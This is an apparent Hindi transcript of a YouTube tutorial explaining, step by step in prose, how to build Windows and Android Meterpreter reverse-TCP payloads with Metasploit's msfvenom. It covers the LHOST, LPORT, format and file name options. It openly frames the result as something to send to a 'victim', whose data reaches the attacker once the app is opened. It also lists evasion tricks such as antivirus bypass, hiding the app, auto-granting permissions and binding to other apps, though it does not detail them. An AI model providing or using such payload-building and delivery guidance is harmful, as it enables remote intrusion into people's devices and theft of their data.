सो हेलो फ्रेंड्स, आप देख रहे हैं ब्लू स्पाइट यूट्यूब चैनल और मैं आज आपको बताने वाला हूँ कि कैसे आप विंडोज़ और एंड्रॉइड के लिए पेलोड क्रिएट कर सकते हो, वो भी मेटास्प्लॉइट की हेल्प से। ये वीडियो में आप लोगों को फुल्ली एक्सप्लेनेशन में बताने वाला हूँ कि कैसे आप पेलोड क्रिएट कर सकते हो। सो फ्रेंड्स, मैंने आप लोगों को इस वीडियो में प्रैक्टिकल करके नहीं दिखाया है, मैं आपको एक्सप्लेनेशन के जरिए ही समझाने वाला हूँ कि पेलोड कैसे क्रिएट होता है और इसी एक्सप्लेनेशन के जरिए आप लोगों को समझ में आ ही जाएगा। सो फ्रेंड्स, प्रैक्टिकल वीडियो अपलोड करने में मुझे कोई प्रॉब्लम नहीं थी यार, और मैं प्रैक्टिकल वीडियो अपलोड भी कर देता, पर मैं अपलोड नहीं कर सकता यार प्रैक्टिकल वीडियो, क्योंकि आप लोगों को तो पता ही है यूट्यूब 2021 में कितना स्ट्रिक्ट हो चुका है। आप लोग तो स्मार्ट हो ही, आप लोगों को तो पता ही है, अगर मैं वीडियो डाल भी देता तो 2-3 दिन के बाद मुझे एक और स्ट्राइक मिल जाता, और मैं नहीं चाहता और आप भी नहीं चाहोगे कि आपके चैनल पर, हमारे चैनल पर एक और स्ट्राइक मिल जाए या फिर ये वीडियो भी डिलीट हो जाती और आगे जाकर हमारा चैनल भी डिलीट हो सकता है। तो यार फ्रेंड्स, मैंने आप लोगों को इस वीडियो में एक्सप्लेनेशन के जरिए इतना अच्छा समझाने की कोशिश की है, तो आप लोगों को 100% समझ में आ ही जाएगा कि पेलोड कैसे क्रिएट होता है। तो सिंपल यार, अगर आपको फिर भी नहीं समझ में आता तो हमारा इंस्टाग्राम तो ही, इंस्टाग्राम पर आप मैसेज कर सकते हो, मैं आप लोगों को पूरी तरह गाइड करने की कोशिश करूंगा। सो फ्रेंड्स, बहुत सारे लोगों को पता होगा कि पेलोड कैसे क्रिएट करते हैं, बट यही रियल मेथड है पेलोड क्रिएट करने की, और यही रियल मेथड मैं आप लोगों को इस वीडियो में बताने वाला हूँ। फुल्ली एक्सप्लेनेशन के जरिए आप लोगों को पूरा समझ में आ जाएगा कि पेलोड कैसे क्रिएट कर। सो फ्रेंड्स, अभी आप लोगों को ध्यान से सुनना है कि मैं आप लोगों को क्या बताने वाला हूँ। सबसे पहली मेथड है पेलोड क्रिएट करने की। पेलोड क्रिएट करने के लिए आप लोगों को सबसे पहले मेटास्प्लॉइट फ्रेमवर्क टूल जो होता है इंस्टॉल कर लेना है अपने टर्मक्स में या फिर अपने काली लिनक्स में। अगर आप टर्मक्स यूज करते हो तो टर्मक्स में भी कर सकते हो, या फिर आप अगर काली लिनक्स यूजर हो तो काली लिनक्स में भी कर सकते हो। सो फ्रेंड्स, मेटास्प्लॉइट फ्रेमवर्क क्या है, कैसे यूज करते और कैसे इंस्टॉल किया जाता है, इसके ऊपर आप लोगों को मैं डेडिकेटेड वीडियो बना दूंगा अगर आप कमेंट करते हो तो सिंपल यार फ्रेंड्स, अभी फिलहाल हम पेलोड का देख रहे हैं, तो सिंपल यार मैं आपको बताता हूँ पेलोड कैसे क्रिएट करना है। तो सबसे पहले आप लोगों को पता चल गया कि मेटास्प्लॉइट फ्रेमवर्क टूल इंस्टॉल कर लेना है। इसके बाद आप लोगों को टर्मक्स में जाना है या फिर काली लिनक्स में जाना है, और मेटास्प्लॉइट फ्रेमवर्क टूल इंस्टॉल करने के बाद MSF कंसोल नाम की जो कमांड स्क्रीन पर शो हो गई है, जो आप लोगों को दिख भी रही होगी, वो कमांड आप लोगों को सिंपली टर्मक्स या फिर काली लिनक्स में डाल देना है। तो सिंपली उससे क्या होगा, हमारा मेटास्प्लॉइट फ्रेमवर्क रन हो जाएगा, और थोड़ी देर वेट करना है, और थोड़ी देर वेट करने के बाद आप लोगों को स्क्रीन पर कुछ ऐसा शो हो जाएगा, मतलब मेटास्प्लॉइट फ्रेमवर्क रन हो जाएगा। और मेटास्प्लॉइट फ्रेमवर्क रन होने के बाद सो फ्रेंड्स, जो कमांड मैं आप लोगों को बताऊंगा वही कमांड आप लोगों को एरो के सामने डाल देना है, जो कि आप लोगों को एरो दिख रहा है स्क्रीन पर, उसके सामने पूरी लॉन्ग कमांड डाल देनी है। तो सिंपली यार वही लॉन्ग कमांड मैं आप लोगों को अभी स्क्रीन पर शो कराता हूँ, तो सिंपली आप लोगों को दिख रही होगी। सो ग्रे लाइन के ऊपर आप लोगों को जो कमांड दिख रही है वो कमांड आप लोगों को वहाँ पर डाल देनी है, जो मैंने आप लोगों को एरो दिखाया था उसके सामने। तो सिंपली यार फ्रेंड्स, मैं आप लोगों को इस पर कुछ एक्सप्लेनेशन करना चाहता हूँ। तो सिंपल यार फ्रेंड्स, आप लोगों को जो ऊपर MSF वेनम से लेकर .exe तक जो कमांड दिख रही है वही सेम टू सेम कमांड आप लोगों को टर्मक्स में डाल देने। पर डालने से पहले मैं आप लोगों को कुछ बताना चाहता हूँ। तो सिंपल फ्रेंड्स, जो आप लोगों को कमांड दिख रही है MSF वेनम -p windows/meterpreter/reverse TCP, तो सिंपली अगर आप लोगों को एंड्रॉइड के लिए पेलोड बनाना है तो सिंपली विंडोज के जगह आप लोगों को एंड्रॉइड लिख देना है, और अगर आपको विंडोज के लिए पेलोड बनाना है तो सिंपली एंड्रॉइड की जगह विंडोज़ लिख देना है। आप लोगों को पता चल गया होगा फ्रेंड्स कि कैसा लिखना है, और उसके आगे विंडोज़ के लिए बनाना है तो विंडोज़ लिखो, और एंड्रॉइड के लिए बनाना है तो एंड्रॉइड लिखो, और एंड्रॉइड के लिए बनाना है तो सपोज आपने एंड्रॉइड लिख दिया, और एंड्रॉइड के बाद एंड्रॉइड/meterpreter/reverse TCP। तो सिंपली इतना आप लोगों को समझ में आ गया। तो उसके आगे आप लोगों को एल होस्ट दिख रहा होगा, तो सिंपली एल होस्ट आपको डालना है, और इक्वल टू के साइन करके जो आप लोगों का IP एड्रेस दिख रहा है 192.168.0.07, तो सिंपली उस IP एड्रेस की जगह आप लोगों को विक्टिम का IP एड्रेस डालना पड़ेगा, जिसको भी आप पेलोड सेंड कर रहे हो उसका IP एड्रेस आप लोगों को डालना पड़ेगा। या फिर अगर आप टेस्टिंग पर्पस के लिए करना चाहते हो तो टेस्टिंग पर्पस के लिए आप खुद का भी IP एड्रेस डाल सकते हो। आई होप कि आप लोगों को यहाँ तक समझ में आ गया होगा। तो सिंपली आप लोगों को आगे दिख रहा होगा यल पोर्ट इक्वल टू 6001, यल पोर्ट इक्वल टू आप लोगों को वैसे की वैसा डाल देना है, और 6001 की जगह आप कोई भी पोर्ट डाल सकते हो, या फिर 6001 भी पोर्ट चलेगा, या फिर 8080 या फिर 4040 पोर्ट भी डाल सकते हो, या फिर 4444 पोर्ट भी डाल सकते हो। सो आई होप फ्रेंड्स कि आप लोगों को यहाँ तक समझ में आ गया होगा। तो सिंपली इसके आगे आप लोगों को दिख रहा होगा -f-exe, तो सिंपली -f का मतलब होता है कि फॉर्मेट, मतलब आपको पेलोड किस फॉर्मेट में क्रिएट करना है, .exe के फॉर्मेट में क्रिएट करना है या फिर APK के फॉर्मेट में क्रिएट करना है। अगर आप लोगों को विंडोज़ के लिए पेलोड क्रिएट करना है तो आप -f के आगे exe लगा सकते हो। अगर आप लोगों को एंड्रॉइड के लिए पेलोड क्रिएट करना है तो आप -f के सामने APK लगा सकते हो। तो सिंपली आप लोगों को यहाँ तक समझ में आ जाना चाहिए। सो फ्रेंड्स, exe के बाद आप लोगों को पेलोड किस नाम से बनाना है वो नाम दे देना होगा। आप लोगों को इस पिक्चर में दिख रहा होगा कि security tutorials.exe नाम का एक पेलोड क्रिएट हो चुका है।
तो सिंपली जिस नेम से आप लोगों को पेलोड क्रिएट करना है वो नाम आप लोगों को डाल देना है। सपोज फॉर एग्जांपल अगर ब्लू स्पाइटेक नाम का एक पेलोड क्रिएट करना है तो मैं डालूंगा bluespytek.exe। और हाँ .exe अगर आप विंडोज़ के लिए बना रहे हो तो .exe लगाना पेलोड के नाम के आगे। अगर आप एंड्रॉयड के लिए बना रहे हो तो एंड्रॉयड के लिए पेलोड के नाम के आगे .apk लगाना। तो सिंपली आप लोगों को यहाँ पर समझ में आ गया होगा। तो ऐसे आप लोगों को ग्रे लाइन में लिखी हुई सारी की सारी पूरी लॉन्ग कमांड आप लोगों को वैसे ही आप लोगों को जिधर एरो दिख रहा है वहाँ पर डाल देनी है मेटास्प्लॉइट फ्रेमवर्क को रन करके। सो फ्रेंड्स, अभी तक आप लोगों को फिर भी समझ में नहीं आया तो मैं आप लोगों को फिर से बता देता हूँ। सबसे पहले हमने क्या किया, मेटास्प्लॉइट फ्रेमवर्क टर्मक्स या फिर काली लिनक्स में इंस्टॉल कर लेना है। और इंस्टॉल करने के बाद सबसे पहले आप लोगों को MSF कंसोल कमांड डालने के बाद आप लोगों को मेटास्प्लॉइट फ्रेमवर्क रन कर लेना है। और रन करने के बाद आप लोगों को जो ऊपर लॉन्ग कमांड दिख रही है वो कमांड आप लोगों को रन करने के बाद वहाँ पर एरो के सामने डाल देनी है। अगर आपको ऊपर की कमांड लिखी हुई में कुछ प्रॉब्लम लगता है या फिर कुछ भी समझ में नहीं आया है तो सिंपली आप इंस्टाग्राम पर मैसेज कर सकते हो, वहाँ मैं आप लोगों को पूरी तरह गाइड करने की कोशिश करूंगा। तो फ्रेंड्स, आप लोगों को जैसा पेलोड क्रिएट करना है उस तरीके से आप लोगों को लॉन्ग कमांड डाल के जहाँ पर एरो दिखाया है वहाँ पर आप लोगों को कमांड डाल देना है। तो फ्रेंड्स, सिंपली कमांड डालने के बाद आप लोगों को एंटर बटन पर क्लिक कर देना है। और एंटर बटन पर क्लिक करने के बाद आप लोग इस पिक्चर में देख सकते हो कि एंटर बटन पर क्लिक करने के बाद आप लोगों का पेलोड क्रिएट हो जाएगा। आप लोगों का पेलोड क्रिएट होने के बाद आप लोगों को वहाँ पर उसकी साइज भी मिल जाएगी, जो कि यहाँ पर लिखी हुई साइज है 73802 बाइट्स। मतलब आप लोग समझ सकते हो कि पेलोड क्रिएट हो चुका है। और पेलोड क्रिएट होने के बाद आप लोगों को सिंपली, अगर आप लोग एंड्रॉइड में पेलोड क्रिएट कर रहे हो तो सिंपली आपके एंड्रॉइड फोन में फाइल मैनेजर में पेलोड सेव हो चुका होगा, या फिर अगर आप काली लिनक्स में पेलोड क्रिएट कर रहे हो तो आपके पीसी में सेव हो चुका होगा। तो सपोज आपने अगर एंड्रॉइड में पेलोड क्रिएट किया होगा तो सिंपली फाइल मैनेजर में सेव हो चुका होगा। और फाइल मैनेजर में सेव हो चुका होगा देखने के लिए आप फाइल मैनेजर में जाने के बाद आप लोगों को सर्च करना है। जिस भी नाम से अगर आपने पेलोड क्रिएट किया है उस नाम से आप लोगों को सर्च कर लेना है। तो सिंपल यार फ्रेंड्स, आप इस पिक्चर में देख सकते हो कि मैंने एक पेलोड.apk के नाम से पेलोड बनाकर रखा था। तो सिंपली जैसे ही आप लोगों ने जिस नाम से पेलोड बनाया है उस नाम का पेलोड अगर आप जैसे विक्टिम के फ़ोन में सेंड करोगे और विक्टिम जैसे इंस्टॉल करेगा और फर्स्ट क्लिक में ओपन करेगा तो ओपन करते ही आप लोगों का विक्टिम का सारा डाटा आपके पास आ जाएगा। तो सिंपली मैंने आप लोगों को सिर्फ इस वीडियो में बताया है कि पेलोड कैसे क्रिएट करते हैं। लोगों को बता दूं कि पेलोड को क्रिएट करके मॉडिफाई भी किया जाता है। मतलब मॉडिफाइड करना मतलब जैसे ही विक्टिम पेलोड को इंस्टॉल करने जाएगा तो कोई भी एंटीवायरस डिटेक्ट ना कर पाए। दूसरा मतलब जैसे ही विक्टिम अपने मोबाइल में पेलोड को इंस्टॉल करेगा तो वो पेलोड हाइड हो जाएगा। और तीसरा सिंपली जैसे ही विक्टिम पेलोड को इंस्टॉल करेगा तो उसके मोबाइल के सारे परमिशन हमारे लिए ऑटो अलाउ हो जाएगी। फोर्थ लास्ट नंबर, जो हमने अभी पेलोड बनाया है उस पेलोड को किसी भी एप्लीकेशन में बाइंड करके भेजना। इसी तरह से पेलोड को ब्लैक अटैकर्स मॉडिफाइड करते। मैंने आप लोगों को इस वीडियो में सिर्फ ओनली पेलोड कैसे क्रिएट किया जाता है वो बताया है। पेलोड को मॉडिफाइड कैसे किया जाता है मैं यूट्यूब पर या फिर किसी भी इंस्टाग्राम पर नहीं बता सकता। अगर आप लोगों को जानना है तो आप लोगों को हमारी वेबसाइट क्रिएट होने तक वेट तो करना ही पड़ेगा। क्योंकि यार फ्रेंड्स, हमारी वेबसाइट जब क्रिएट होगी तो मैं आप लोगों को इथिकल हैकिंग के कोर्सेज और प्रैक्टिकल्स पूरे डीप में प्रोवाइड करूंगा। बट यार फ्रेंड्स, इसके लिए तो आप लोगों को लॉन्ग वेट तो करना ही पड़ेगा। और इसके लिए सॉरी यार, आप लोगों को लॉन्ग वेट करना पड़ रहा है, बट क्या कर सकते, क्योंकि अभी तक मेरे पास इतना बजट नहीं है कि मैं वेबसाइट क्रिएट कर सकूं। सो फ्रेंड्स, अगर आप ऐसे ही सपोर्ट करते रहे तो मैं आप लोगों को इथिकल हैकिंग, साइबर सिक्योरिटी और टेक्निकल नॉलेज से रिलेटेड एडवांस लेवल की वीडियोस प्रोवाइड करता हूं और करता रहूंगा। बस आप लोगों को इस वीडियो को लाइक, शेयर, कमेंट कर देना है और सब्सक्राइब भी कर देना है और बेल आइकन ऑल पर सिलेक्ट कर देना है ताकि आप लोगों को इथिकल हैकिंग, साइबर सिक्योरिटी और टेक्निकल नॉलेज से रिलेटेड वीडियोस सबसे पहले देखने को मिले। ये बताइए कि फ्रेंड्स, आप लोगों को बहुत गुस्सा आ रहा होगा क्योंकि मैंने प्रैक्टिकल वीडियो नहीं डाली, पर मैं भी क्या कर सकता हूँ यार। यूट्यूब इतना स्ट्रिक्ट हो चुका है कि वो वीडियो भी डिलीट कर देता और आगे जाकर हमारा चैनल भी डिलीट हो सकता था। तो फ्रेंड्स प्लीज़ यार समझने की कोशिश कीजिए। तो चलिए चलते फ्रेंड्स, आज के लिए इतना ही। जय हिंद, वंदे मातरम।